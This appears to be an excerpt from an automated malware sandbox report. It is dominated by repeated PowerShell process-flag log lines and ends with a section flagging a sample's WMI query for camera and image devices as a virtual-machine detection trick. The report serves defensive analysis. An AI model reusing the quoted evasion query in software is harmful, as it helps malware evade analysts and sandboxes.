                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
